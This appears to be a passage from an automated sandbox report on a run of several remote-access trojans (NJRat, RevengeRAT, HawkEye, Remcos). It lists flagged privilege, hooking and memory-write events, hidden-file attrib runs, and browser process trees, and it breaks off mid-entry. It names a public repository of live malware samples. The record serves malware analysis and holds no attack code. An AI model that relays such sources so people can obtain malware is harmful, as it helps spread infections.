2260	NJRat.exe
2260	NJRat.exe
2260	NJRat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 44 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exeNJRat.exeRevengeRAT.exeRegSvcs.exeRevengeRAT.exeNJRat.exeHawkEye.exeRegSvcs.exeNJRat.exe

description	pid	process
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	2260	NJRat.exe
Token: SeDebugPrivilege	1772	RevengeRAT.exe
Token: SeDebugPrivilege	1124	RegSvcs.exe
Token: 33	2260	NJRat.exe
Token: SeIncBasePriorityPrivilege	2260	NJRat.exe
Token: SeDebugPrivilege	4680	RevengeRAT.exe
Token: SeDebugPrivilege	2056	NJRat.exe
Token: SeDebugPrivilege	3344	HawkEye.exe
Token: SeDebugPrivilege	2016	RegSvcs.exe
Token: 33	2260	NJRat.exe
Token: SeIncBasePriorityPrivilege	2260	NJRat.exe
Token: SeDebugPrivilege	5300	NJRat.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

WINWORD.EXERemcos.exe

pid	process
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
3712	WINWORD.EXE
4856	Remcos.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1704 wrote to memory of 2600	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 2600	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3660	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3964	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3964	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1120	1704	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

pid	process
4888	attrib.exe
7904	attrib.exe
7500	attrib.exe
10324	attrib.exe
1516	attrib.exe
1396	attrib.exe
4188	attrib.exe
6368	attrib.exe
2744	attrib.exe
7912	attrib.exe
8580	attrib.exe
7140	attrib.exe
11028	attrib.exe
6488	attrib.exe
6576	attrib.exe
1060	attrib.exe
7548	attrib.exe
8500	attrib.exe
9300	attrib.exe
5216	attrib.exe
7900	attrib.exe
9576	attrib.exe
5540	attrib.exe
6808	attrib.exe
7316	attrib.exe
8104	attrib.exe
4692	attrib.exe
2128	attrib.exe
2960	attrib.exe
8320	attrib.exe
10204	attrib.exe
10336	attrib.exe
352	attrib.exe
3316	attrib.exe
8976	attrib.exe
1932	attrib.exe
2780	attrib.exe
5152	attrib.exe
2904	attrib.exe
9576	attrib.exe
10796	attrib.exe
1020	attrib.exe
3384	attrib.exe
8000	attrib.exe
7188	attrib.exe
3040	attrib.exe
7120	attrib.exe
2184	attrib.exe
8140	attrib.exe
8324	attrib.exe
8628	attrib.exe
9584	attrib.exe
6792	attrib.exe
8056	attrib.exe
7116	attrib.exe
9200	attrib.exe
3164	attrib.exe
10716	attrib.exe
4912	attrib.exe
5220	attrib.exe
7532	attrib.exe
2652	attrib.exe
6448	attrib.exe
7088	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Chimera
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd584b3cb8,0x7ffd584b3cc8,0x7ffd584b3cd8
  2⤵
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5292 /prefetch:8
  2⤵
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:1232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:2692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
  2⤵
  PID:2452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7256 /prefetch:8
  2⤵
  PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
  2⤵
  PID:1288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:1216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8272 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8132 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8232 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9064 /prefetch:1
  2⤵
  PID:5684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8460 /prefetch:8
  2⤵
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
  2⤵
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3568 /prefetch:8
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9468 /prefetch:1
  2⤵
  PID:5332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6528 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:1
  2⤵
  PID:5832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8776 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13300699058343323347,11783822961222093352,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8864 /prefetch:8
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
